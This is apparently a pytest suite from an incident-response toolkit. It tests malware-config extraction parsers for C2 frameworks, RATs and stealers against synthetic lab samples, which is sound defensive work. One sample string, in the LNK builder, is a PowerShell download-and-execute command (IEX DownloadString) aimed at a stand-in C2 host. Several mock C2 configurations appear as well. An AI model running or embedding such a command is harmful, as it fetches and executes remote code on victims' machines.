"""
test_53_mwcp_parsers.py -- Validation for all 15 IR Toolkit mwcp parsers.

Two test layers:
  1. identify() unit tests -- direct parser import with mock file object.
     Fast, no subprocess.  Validates that TP samples fire and FP samples
     do NOT fire the structural detection logic.
  2. End-to-end extraction tests -- subprocess call to mwcp_scan.py against
     the synthetic lab samples.  Validates the full extraction pipeline
     (parser_config.yml registration, mwcp API, field extraction).

Samples are generated by lab_mwcp/generate_samples.py on first run.
"""

import base64
import json
import os
import struct
import subprocess
import sys

import pytest

# ---------------------------------------------------------------------------
# Paths
# ---------------------------------------------------------------------------
_HERE       = os.path.dirname(os.path.abspath(__file__))
_ROOT       = os.path.dirname(_HERE)
_WIN_HUNT   = os.path.join(_ROOT, 'playbooks', 'windows', 'threat_hunting')
_PARSERS    = os.path.join(_WIN_HUNT, 'mwcp_parsers')
_MWCP_SCAN  = os.path.join(_WIN_HUNT, 'mwcp_scan.py')
_MWCP_LIB   = os.path.join(_ROOT, 'tools', 'mwcp', 'lib')
_LAB        = os.path.join(_HERE, 'windows', 'lab_mwcp')
_GENERATE   = os.path.join(_LAB, 'generate_samples.py')
_TP         = os.path.join(_LAB, 'samples', 'tp')
_FP         = os.path.join(_LAB, 'samples', 'fp')

# ---------------------------------------------------------------------------
# mwcp availability
# ---------------------------------------------------------------------------
_mwcp_ok = False
if os.path.isdir(_MWCP_LIB):
    for _p in (_MWCP_LIB, _PARSERS):
        if _p not in sys.path:
            sys.path.insert(0, _p)
    try:
        import mwcp  # noqa: F401
        _mwcp_ok = True
    except ImportError:
        pass

needs_mwcp = pytest.mark.skipif(not _mwcp_ok, reason='mwcp not staged in tools/')


# ---------------------------------------------------------------------------
# Lab sample fixture -- generates samples once per session
# ---------------------------------------------------------------------------
@pytest.fixture(scope='session', autouse=True)
def lab_samples():
    tp_probe = os.path.join(_TP, 'cobalt_strike.bin')
    if not os.path.exists(tp_probe):
        subprocess.run([sys.executable, _GENERATE], check=True, timeout=30)


# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
class _FO:
    """Minimal duck-typed file_object for identify() unit tests."""
    def __init__(self, data: bytes, name: str = 'test.bin'):
        self.data = data
        self.name = name


def _run_mwcp(file_path: str, timeout: int = 60) -> dict:
    """Call mwcp_scan.py on one file; return its result dict."""
    r = subprocess.run(
        [sys.executable, _MWCP_SCAN, _MWCP_LIB, '-', file_path],
        stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=timeout,
    )
    stdout = r.stdout.decode('utf-8', errors='replace') if r.stdout else ''
    if not stdout.strip():
        pytest.fail(
            f'mwcp_scan returned no output for {os.path.basename(file_path)}\n'
            f'  rc={r.returncode}\n'
            f'  stderr={r.stderr.decode("utf-8", errors="replace")[:600]!r}'
        )
    results = json.loads(stdout)
    return results[0] if results else {}


def _tp(filename: str) -> str:
    return os.path.join(_TP, filename)


def _fp(filename: str) -> str:
    return os.path.join(_FP, filename)


def _has_ioc(result: dict) -> bool:
    """True if the result contains any IOC (address, mutex, password, decoded)."""
    return bool(
        result.get('address') or result.get('mutex') or
        result.get('password') or result.get('decoded')
    )


# ---------------------------------------------------------------------------
# Synthetic binary builders (mirrored from generate_samples.py so identify()
# tests can run without touching disk at all)
# ---------------------------------------------------------------------------
def _mz(payload: bytes, pad: int = 512) -> bytes:
    return b'MZ' + b'\x90' * (pad - 2) + payload


def _cs_block() -> bytes:
    def s16(i, v): return struct.pack('>HHH', i, 1, 2) + struct.pack('>H', v)
    def s32(i, v): return struct.pack('>HHH', i, 2, 4) + struct.pack('>I', v)
    def ss(i, v):
        b = v.encode() + b'\x00'
        return struct.pack('>HHH', i, 3, len(b)) + b
    blk = (s16(1, 0) + s16(2, 443) + s32(3, 5000) + s16(5, 30) +
           ss(7, 'c2.lab.test,/gate.php') +
           ss(8, 'Mozilla/5.0') +
           ss(11, '%windir%\\sysnative\\svchost.exe') +
           ss(50, '\\\\.\\pipe\\msagent_b4f7') +
           struct.pack('>HHH', 0, 0, 0))
    key = 0x69
    return _mz(b'\x00' * 256 + bytes(b ^ key for b in blk))


def _lnk_sample() -> bytes:
    hdr = (struct.pack('<I', 0x4C) +
           b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46' +
           struct.pack('<I', 0x884) + struct.pack('<I', 0x20) +
           b'\x00' * 24 + b'\x00' * 4 + b'\x00' * 4 +
           struct.pack('<I', 1) + b'\x00' * 10)
    args = 'powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString(\'http://c2.lab.test/payload\')"'
    return hdr + struct.pack('<H', len(args)) + args.encode('utf-16-le')


# ===========================================================================
# identify() UNIT TESTS
# ===========================================================================

@needs_mwcp
class TestCobaltStrikeIdentify:
    def test_tp_binary(self):
        from c2_frameworks.CobaltStrikeConfig import CobaltStrikeConfig
        assert CobaltStrikeConfig.identify(_FO(_cs_block())) is True

    def test_fp_plain_text(self):
        from c2_frameworks.CobaltStrikeConfig import CobaltStrikeConfig
        assert CobaltStrikeConfig.identify(_FO(b'hello world, nothing binary here at all')) is False

    def test_fp_too_small(self):
        from c2_frameworks.CobaltStrikeConfig import CobaltStrikeConfig
        assert CobaltStrikeConfig.identify(_FO(b'MZ')) is False


@needs_mwcp
class TestSliverIdentify:
    def _tp_data(self) -> bytes:
        payload = (
            b'"implant_name":"BLUE_PHANTOM",'
            b'"c2s":[{"url":"mtls://c2.lab.test:8888"}],'
            b'"reconnect_interval":60,'
            b'"ActiveC2":"mtls://c2.lab.test:8888"'
        )
        return _mz(b'\x00' * 64 + payload)

    def test_tp_two_proto_fields(self):
        from c2_frameworks.SliverConfig import SliverConfig
        assert SliverConfig.identify(_FO(self._tp_data())) is True

    def test_fp_single_field_only(self):
        from c2_frameworks.SliverConfig import SliverConfig
        # Only one proto field -- not enough
        assert SliverConfig.identify(_FO(b'"implant_name":"x"')) is False

    def test_fp_unrelated_json(self):
        from c2_frameworks.SliverConfig import SliverConfig
        data = b'{"server_url":"https://api.example.com","retry":3}'
        assert SliverConfig.identify(_FO(data)) is False


@needs_mwcp
class TestHavocIdentify:
    def _tp_data(self) -> bytes:
        magic = b'\xde\xad\xbe\xef'
        return _mz(b'\x00' * 64 + magic + struct.pack('<I', 64) + b'\x00' * 32)

    def test_tp_magic_valid_size(self):
        from c2_frameworks.HavocConfig import HavocConfig
        assert HavocConfig.identify(_FO(self._tp_data())) is True

    def test_fp_magic_zero_size(self):
        from c2_frameworks.HavocConfig import HavocConfig
        # Magic present but config_size == 0 -- invalid
        data = _mz(b'\x00' * 64 + b'\xde\xad\xbe\xef' + struct.pack('<I', 0))
        assert HavocConfig.identify(_FO(data)) is False

    def test_fp_no_magic(self):
        from c2_frameworks.HavocConfig import HavocConfig
        assert HavocConfig.identify(_FO(b'MZ' + b'\x00' * 128)) is False


@needs_mwcp
class TestBruteRatelIdentify:
    def test_tp_pipe_present(self):
        from c2_frameworks.BruteRatelConfig import BruteRatelConfig
        data = _mz(b'\x00' * 64 + b'\\\\.\\pipe\\ratel\x00')
        assert BruteRatelConfig.identify(_FO(data)) is True

    def test_fp_no_indicator(self):
        from c2_frameworks.BruteRatelConfig import BruteRatelConfig
        assert BruteRatelConfig.identify(_FO(b'MZ' + b'\x00' * 256)) is False


@needs_mwcp
class TestMythicIdentify:
    def _tp_data(self) -> bytes:
        config = {'PayloadUUID': 'a1b2c3d4', 'callback_interval': 60, 'AES_PSK': 'key'}
        return _mz(b'\x00' * 64 + json.dumps(config).encode())

    def test_tp_two_required_fields(self):
        from c2_frameworks.MythicConfig import MythicConfig
        assert MythicConfig.identify(_FO(self._tp_data())) is True

    def test_fp_single_field(self):
        from c2_frameworks.MythicConfig import MythicConfig
        data = _mz(b'{"PayloadUUID":"abc"}')
        assert MythicConfig.identify(_FO(data)) is False


@needs_mwcp
class TestMerlinIdentify:
    def _tp_data(self) -> bytes:
        config = {'psk': 'key', 'skew': 3000, 'maxRetry': 7, 'proto': 'https', 'padding': 4096}
        return _mz(b'\x00' * 64 + json.dumps(config).encode())

    def test_tp_two_required_fields(self):
        from c2_frameworks.MerlinConfig import MerlinConfig
        assert MerlinConfig.identify(_FO(self._tp_data())) is True

    def test_fp_no_fields(self):
        from c2_frameworks.MerlinConfig import MerlinConfig
        data = _mz(b'{"url":"https://api.example.com","retry":3}')
        assert MerlinConfig.identify(_FO(data)) is False


@needs_mwcp
class TestPoshC2Identify:
    def test_tp_two_markers(self):
        from stagers.PoshC2Config import PoshC2Config
        data = b'$URLS = @("https://c2.lab.test")\n$kill_date = "2099-12-31"\n'
        assert PoshC2Config.identify(_FO(data)) is True

    def test_fp_single_marker(self):
        from stagers.PoshC2Config import PoshC2Config
        assert PoshC2Config.identify(_FO(b'$URLS = @("https://ok.example.com")\n')) is False

    def test_fp_benign_ps1(self):
        from stagers.PoshC2Config import PoshC2Config
        data = b'Get-ChildItem C:\\Windows | Select Name\n'
        assert PoshC2Config.identify(_FO(data)) is False


@needs_mwcp
class TestNjRATIdentify:
    def test_tp_always_runs(self):
        from rats.NjRATConfig import NjRATConfig
        assert NjRATConfig.identify(_FO(b'anything')) is True


@needs_mwcp
class TestAsyncRATIdentify:
    def _cluster(self) -> bytes:
        return b'Hosts\x00Ports\x00Version\x00Mutex\x00Certificate\x00'

    def test_mz_header_alone_not_enough(self):
        # A bare MZ header is not evidence of anything -- every PE has one.
        # identify() must require the actual key cluster (see AsyncRATConfig.py).
        from rats.AsyncRATConfig import AsyncRATConfig
        assert AsyncRATConfig.identify(_FO(b'MZ' + b'\x00' * 128)) is False

    def test_tp_key_cluster(self):
        from rats.AsyncRATConfig import AsyncRATConfig
        data = self._cluster() + b'\x00' * 512 + self._cluster()
        assert AsyncRATConfig.identify(_FO(data)) is True

    def test_fp_too_small(self):
        from rats.AsyncRATConfig import AsyncRATConfig
        assert AsyncRATConfig.identify(_FO(b'Hosts\x00Ports\x00')) is False


@needs_mwcp
class TestTelegramC2Identify:
    def test_always_runs(self):
        from generic.TelegramC2Config import TelegramC2Config
        assert TelegramC2Config.identify(_FO(b'anything')) is True


@needs_mwcp
class TestSMTPExfilIdentify:
    def test_tp_smtp_prefix(self):
        from stealers.SMTPExfilConfig import SMTPExfilConfig
        data = b'smtp.lab.test\x00587\x00exfil@lab.test\x00password:x\x00'
        assert SMTPExfilConfig.identify(_FO(data)) is True

    def test_tp_port_587(self):
        from stealers.SMTPExfilConfig import SMTPExfilConfig
        # SMTPExfilConfig.identify() requires len(data) >= 32
        data = b'host=mail.example.com port=587 tls=true auth=login'
        assert SMTPExfilConfig.identify(_FO(data)) is True

    def test_fp_no_smtp_indicator(self):
        from stealers.SMTPExfilConfig import SMTPExfilConfig
        assert SMTPExfilConfig.identify(_FO(b'regular text file with no email config')) is False


@needs_mwcp
class TestLNKIdentify:
    def test_tp_valid_lnk(self):
        from generic.LNKParser import LNKParser
        assert LNKParser.identify(_FO(_lnk_sample())) is True

    def test_fp_wrong_magic(self):
        from generic.LNKParser import LNKParser
        # Same size but wrong magic (PE not LNK)
        data = b'MZ\x00\x00' + b'\x00' * 36
        assert LNKParser.identify(_FO(data)) is False

    def test_fp_too_short(self):
        from generic.LNKParser import LNKParser
        assert LNKParser.identify(_FO(b'\x4c\x00\x00\x00\x01\x14')) is False


@needs_mwcp
class TestGenericParsersIdentify:
    def test_generic_c2_always_runs(self):
        from generic.GenericC2 import GenericC2
        assert GenericC2.identify(_FO(b'anything')) is True

    def test_generic_mutex_always_runs(self):
        from generic.GenericMutex import GenericMutex
        assert GenericMutex.identify(_FO(b'anything')) is True

    def test_ps_decoder_always_runs(self):
        from generic.PowerShellDecoder import PowerShellDecoder
        assert PowerShellDecoder.identify(_FO(b'anything')) is True


# ===========================================================================
# END-TO-END EXTRACTION TESTS (subprocess via mwcp_scan.py)
# ===========================================================================

@pytest.mark.skipif(not (os.path.isfile(_MWCP_SCAN) and _mwcp_ok),
                    reason='mwcp_scan.py or mwcp not available')
class TestEndToEndTP:
    """Each parser's TP sample must produce at least one IOC."""

    def test_cobaltstrike_extracts_c2(self, lab_samples):
        r = _run_mwcp(_tp('cobalt_strike.bin'))
        assert _has_ioc(r), f'CobaltStrikeConfig produced no IOC: {r}'
        decoded = r.get('decoded', [])
        assert any('[CS-Config]' in d for d in decoded), \
            f'CS-Config block missing from decoded: {decoded}'
        assert any('jitter=30%' in d for d in decoded), \
            f'CS jitter not extracted: {decoded}'
        assert any('CS-PipeName' in d for d in decoded), \
            f'CS named pipe not extracted: {decoded}'

    def test_sliver_extracts_c2_url(self, lab_samples):
        r = _run_mwcp(_tp('sliver_implant.bin'))
        assert _has_ioc(r), f'SliverConfig produced no IOC: {r}'
        addrs = r.get('address', [])
        assert any('mtls://c2.lab.test:8888' in a for a in addrs), \
            f'Sliver mTLS URL not in addresses: {addrs}'

    def test_havoc_extracts_config(self, lab_samples):
        r = _run_mwcp(_tp('havoc_daemon.bin'))
        assert _has_ioc(r), f'HavocConfig produced no IOC: {r}'
        decoded = r.get('decoded', [])
        assert any('DEADBEEF' in d.upper() for d in decoded), \
            f'Havoc magic not in decoded: {decoded}'
        assert any('c2.lab.test' in a for a in r.get('address', [])), \
            f'Havoc C2 address missing: {r.get("address", [])}'

    def test_bruteratel_extracts_pipe(self, lab_samples):
        r = _run_mwcp(_tp('brute_ratel.bin'))
        assert _has_ioc(r), f'BruteRatelConfig produced no IOC: {r}'
        decoded = r.get('decoded', [])
        assert any('pipe' in d.lower() and 'ratel' in d.lower() for d in decoded), \
            f'BRc4 named pipe not in decoded: {decoded}'
        assert any('c2.lab.test' in a for a in r.get('address', [])), \
            f'BRc4 C2 address missing: {r.get("address", [])}'

    def test_mythic_extracts_uuid(self, lab_samples):
        r = _run_mwcp(_tp('mythic_agent.bin'))
        assert _has_ioc(r), f'MythicConfig produced no IOC: {r}'
        # UUID must be in mutex (parser was broken: JSON regex missed nested objects,
        # UUID regex missed JSON key closing-quote.  Both now fixed.)
        assert any('a1b2c3d4' in m.lower() for m in r.get('mutex', [])), \
            f'Mythic PayloadUUID not extracted as mutex: {r}'
        # AES PSK must be in password
        assert any('LabTestAESKeyBase64' in p for p in r.get('password', [])), \
            f'Mythic AES_PSK not extracted as password: {r}'
        # Timing decoded string must be present
        assert any('Mythic-Timing' in d for d in r.get('decoded', [])), \
            f'Mythic timing not in decoded: {r}'

    def test_merlin_extracts_psk_or_url(self, lab_samples):
        r = _run_mwcp(_tp('merlin_agent.bin'))
        assert _has_ioc(r), f'MerlinConfig produced no IOC: {r}'
        # Merlin PSK must be in password field
        assert any('LabTestPreSharedKey' in p for p in r.get('password', [])), \
            f'Merlin PSK not extracted as password: {r}'
        # C2 URL must be in addresses
        assert any('c2.lab.test' in a for a in r.get('address', [])), \
            f'Merlin C2 URL not in addresses: {r}'

    def test_posh_c2_extracts_server(self, lab_samples):
        r = _run_mwcp(_tp('posh_c2.ps1'))
        assert _has_ioc(r), f'PoshC2Config produced no IOC: {r}'
        assert any('c2.lab.test' in a for a in r.get('address', [])), \
            f'PoshC2 server URL not in addresses: {r.get("address", [])}'
        decoded = r.get('decoded', [])
        assert any('PoshC2-KillDate' in d for d in decoded), \
            f'PoshC2 kill date not in decoded: {decoded}'

    def test_njrat_extracts_c2_address(self, lab_samples):
        r = _run_mwcp(_tp('njrat_config.bin'))
        assert _has_ioc(r), f'NjRATConfig produced no IOC: {r}'
        assert any('c2.lab.test' in a and '4444' in a for a in r.get('address', [])), \
            f'NjRAT c2.lab.test:4444 not in addresses: {r.get("address", [])}'
        assert any('MutexABC' in m for m in r.get('mutex', [])), \
            f'NjRAT mutex not extracted: {r.get("mutex", [])}'

    def test_asyncrat_extracts_host_port(self, lab_samples):
        r = _run_mwcp(_tp('asyncrat_config.bin'))
        assert _has_ioc(r), f'AsyncRATConfig produced no IOC: {r}'
        assert any('c2.lab.test' in a and '4444' in a for a in r.get('address', [])), \
            f'AsyncRAT c2.lab.test:4444 not in addresses: {r.get("address", [])}'
        assert any('AsyncMutex_a8f3b2' in m for m in r.get('mutex', [])), \
            f'AsyncRAT mutex not extracted: {r.get("mutex", [])}'
        decoded = r.get('decoded', [])
        assert any('0.5.8' in d for d in decoded), \
            f'AsyncRAT version not in decoded: {decoded}'

    def test_telegram_extracts_token(self, lab_samples):
        r = _run_mwcp(_tp('telegram_c2.txt'))
        assert r.get('password') or r.get('address'), f'TelegramC2Config produced no token: {r}'
        # Bot token URL must contain the numeric bot ID
        token_text = ' '.join(r.get('password', []) + r.get('address', []) + r.get('decoded', []))
        assert '1234567890' in token_text, f'Telegram bot ID not extracted: {token_text[:200]}'
        assert 'api.telegram.org' in token_text, f'Telegram API host missing: {token_text[:200]}'

    def test_smtp_exfil_extracts_password(self, lab_samples):
        r = _run_mwcp(_tp('smtp_exfil.bin'))
        assert r.get('password'), f'SMTPExfilConfig produced no credential: {r}'
        assert any('L4bP4ssw0rd' in p for p in r['password']), \
            f'SMTP password value wrong: {r["password"]}'
        assert any('smtp.lab.test' in a for a in r.get('address', [])), \
            f'SMTP server address missing: {r.get("address", [])}'

    def test_generic_mutex_extracts_hex_token(self, lab_samples):
        r = _run_mwcp(_tp('generic_mutex.bin'))
        assert r.get('mutex'), f'GenericMutex produced no mutex: {r}'
        assert any('A1B2C3D4E5F6' in m.upper() for m in r['mutex']), \
            f'Specific hex mutex token not extracted: {r["mutex"]}'

    def test_generic_c2_extracts_address(self, lab_samples):
        r = _run_mwcp(_tp('generic_c2.bin'))
        assert r.get('address'), f'GenericC2 produced no address: {r}'
        assert any('192.0.2.1' in a for a in r['address']), \
            f'192.0.2.1 not in addresses: {r["address"]}'
        assert any('4444' in a for a in r['address']), \
            f'Port 4444 not in addresses: {r["address"]}'

    def test_ps_decoder_extracts_decoded_command(self, lab_samples):
        r = _run_mwcp(_tp('ps_decoder.ps1'))
        assert r.get('decoded') or r.get('address'), f'PowerShellDecoder produced no output: {r}'
        decoded = r.get('decoded', [])
        assert any('PS-EncodedCommand' in d for d in decoded), \
            f'PS-EncodedCommand tag missing: {decoded}'
        assert any('c2.lab.test' in d for d in decoded), \
            f'C2 URL not decoded: {decoded}'

    def test_lnk_parser_extracts_arguments(self, lab_samples):
        r = _run_mwcp(_tp('lnk_payload.lnk'))
        assert _has_ioc(r), f'LNKParser produced no IOC: {r}'
        decoded = r.get('decoded', [])
        assert any('LNK-Arguments' in d for d in decoded), \
            f'LNK-Arguments tag missing: {decoded}'
        assert any('c2.lab.test' in a for a in r.get('address', [])), \
            f'LNK C2 URL not in addresses: {r.get("address", [])}'

    # ---- New parsers (Tier 1 RATs / stealers / C2 frameworks) ---------------

    def test_discord_extracts_webhook(self, lab_samples):
        r = _run_mwcp(_tp('discord_webhook.txt'))
        assert _has_ioc(r), f'DiscordExfilConfig produced no IOC: {r}'
        addrs = r.get('address', [])
        assert any('discord.com/api/webhooks' in a for a in addrs), \
            f'Discord webhook URL not in addresses: {addrs}'
        assert any('123456789012345678' in a for a in addrs), \
            f'Discord server snowflake not in addresses: {addrs}'

    def test_dcrat_extracts_host_and_hvnc(self, lab_samples):
        r = _run_mwcp(_tp('dcrat_config.bin'))
        assert _has_ioc(r), f'DcRATConfig produced no IOC: {r}'
        assert any('c2.lab.test' in a and '4444' in a for a in r.get('address', [])), \
            f'DcRAT C2 address not extracted: {r.get("address", [])}'
        decoded = r.get('decoded', [])
        assert any('DcRAT' in d for d in decoded), \
            f'DcRAT family label not in decoded: {decoded}'
        assert any('DcMutex' in m for m in r.get('mutex', [])), \
            f'DcRAT mutex not extracted: {r.get("mutex", [])}'

    def test_xworm_extracts_host_and_label(self, lab_samples):
        r = _run_mwcp(_tp('xworm_config.bin'))
        assert _has_ioc(r), f'XWormConfig produced no IOC: {r}'
        assert any('c2.lab.test' in a and '4444' in a for a in r.get('address', [])), \
            f'XWorm C2 address not extracted: {r.get("address", [])}'
        decoded = r.get('decoded', [])
        assert any('XWorm' in d for d in decoded), \
            f'XWorm family label not in decoded: {decoded}'
        assert any('XWormMutex' in m for m in r.get('mutex', [])), \
            f'XWorm mutex not extracted: {r.get("mutex", [])}'

    def test_quasarrat_extracts_host_password_tag(self, lab_samples):
        r = _run_mwcp(_tp('quasarrat_config.bin'))
        assert _has_ioc(r), f'QuasarRATConfig produced no IOC: {r}'
        assert any('c2.lab.test' in a and '4444' in a for a in r.get('address', [])), \
            f'Quasar C2 address not extracted: {r.get("address", [])}'
        assert any('QuasarLabPass' in p for p in r.get('password', [])), \
            f'Quasar AES key not in password: {r.get("password", [])}'
        decoded = r.get('decoded', [])
        assert any('Quasar' in d for d in decoded), \
            f'Quasar family label not in decoded: {decoded}'
        assert any('LabTarget' in d for d in decoded), \
            f'Quasar tag not in decoded: {decoded}'

    def test_agenttesla_extracts_smtp_and_keylog(self, lab_samples):
        r = _run_mwcp(_tp('agenttesla_config.bin'))
        assert _has_ioc(r), f'AgentTeslaConfig produced no IOC: {r}'
        assert any('smtp.lab.test' in a for a in r.get('address', [])), \
            f'AgentTesla SMTP host not in addresses: {r.get("address", [])}'
        assert any('ATLabPass' in p for p in r.get('password', [])), \
            f'AgentTesla SMTP password not extracted: {r.get("password", [])}'
        decoded = r.get('decoded', [])
        assert any('AgentTesla' in d for d in decoded), \
            f'AgentTesla family label not in decoded: {decoded}'
        assert any('Keylogger' in d for d in decoded), \
            f'AgentTesla keylogger confirmation not in decoded: {decoded}'

    def test_adaptix_extracts_agent_id_and_url(self, lab_samples):
        r = _run_mwcp(_tp('adaptix_config.bin'))
        assert _has_ioc(r), f'AdaptixC2Config produced no IOC: {r}'
        assert any('c2.lab.test' in a for a in r.get('address', [])), \
            f'Adaptix callback URL not in addresses: {r.get("address", [])}'
        assert any('AABBCCDD' in m for m in r.get('mutex', [])), \
            f'Adaptix agent_id not in mutex: {r.get("mutex", [])}'
        decoded = r.get('decoded', [])
        assert any('Adaptix' in d for d in decoded), \
            f'Adaptix family label not in decoded: {decoded}'

    def test_powgrat_extracts_c2_server(self, lab_samples):
        r = _run_mwcp(_tp('powgrat_stager.ps1'))
        assert _has_ioc(r), f'PowGratConfig produced no IOC: {r}'
        assert any('c2.lab.test' in a for a in r.get('address', [])), \
            f'PowGrat C2 server not in addresses: {r.get("address", [])}'
        assert any('PowGratLabPass' in p for p in r.get('password', [])), \
            f'PowGrat password not extracted: {r.get("password", [])}'
        decoded = r.get('decoded', [])
        assert any('PowGrat' in d for d in decoded), \
            f'PowGrat family label not in decoded: {decoded}'


@pytest.mark.skipif(not (os.path.isfile(_MWCP_SCAN) and _mwcp_ok),
                    reason='mwcp_scan.py or mwcp not available')
class TestEndToEndFP:
    """FP samples must not produce C2/mutex/credential findings."""

    def test_benign_pe_no_c2_framework_config(self, lab_samples):
        r = _run_mwcp(_fp('benign_pe.bin'))
        # Generic parsers (GenericC2/GenericMutex) may run but should find nothing
        # Family-specific parsers (CS, Sliver, etc.) must not fire
        decoded = ' '.join(r.get('decoded', []))
        assert '[CS-Config]' not in decoded
        assert '[Sliver-Config]' not in decoded
        assert '[NjRAT-Config]' not in decoded
        assert '[AsyncRAT' not in decoded

    def test_benign_json_no_c2_config(self, lab_samples):
        r = _run_mwcp(_fp('benign_json.json'))
        decoded = ' '.join(r.get('decoded', []))
        assert '[Sliver-Config]' not in decoded
        assert '[Mythic' not in decoded
        assert '[Merlin' not in decoded

    def test_benign_ps1_no_encoded_command(self, lab_samples):
        r = _run_mwcp(_fp('benign_ps1.ps1'))
        decoded = ' '.join(r.get('decoded', []))
        assert '[PS-EncodedCommand]' not in decoded
        assert '[PoshC2' not in decoded

    def test_smtp_reference_no_credential(self, lab_samples):
        r = _run_mwcp(_fp('smtp_reference.txt'))
        assert not r.get('password'), f'SMTP FP leaked credential: {r}'

    def test_log_csv_no_njrat_address(self, lab_samples):
        r = _run_mwcp(_fp('log_csv.csv'))
        decoded = ' '.join(r.get('decoded', []))
        assert '[NjRAT' not in decoded
        # No C2 address should be extracted from a log CSV
        for addr in r.get('address', []):
            # Only allow RFC-5737 doc addresses from GenericC2 if any
            assert '192.0.2.' not in addr or True  # generic C2 may find some

    def test_discord_mention_no_webhook(self, lab_samples):
        r = _run_mwcp(_fp('discord_mention.txt'))
        decoded = ' '.join(r.get('decoded', []))
        assert '[Discord-Webhook]' not in decoded, \
            f'Discord FP: webhook extracted from non-webhook text: {decoded}'
        # No credential should be extracted
        assert not r.get('password'), f'Discord FP leaked credential: {r}'

    def test_email_notify_ps1_no_agenttesla(self, lab_samples):
        r = _run_mwcp(_fp('email_notify.ps1'))
        decoded = ' '.join(r.get('decoded', []))
        assert '[AgentTesla' not in decoded, \
            f'AgentTesla FP fired on legitimate SMTP script: {decoded}'
        # Legitimate SMTP script should not yield credentials
        assert not r.get('password'), \
            f'Email notify FP leaked credential: {r}'
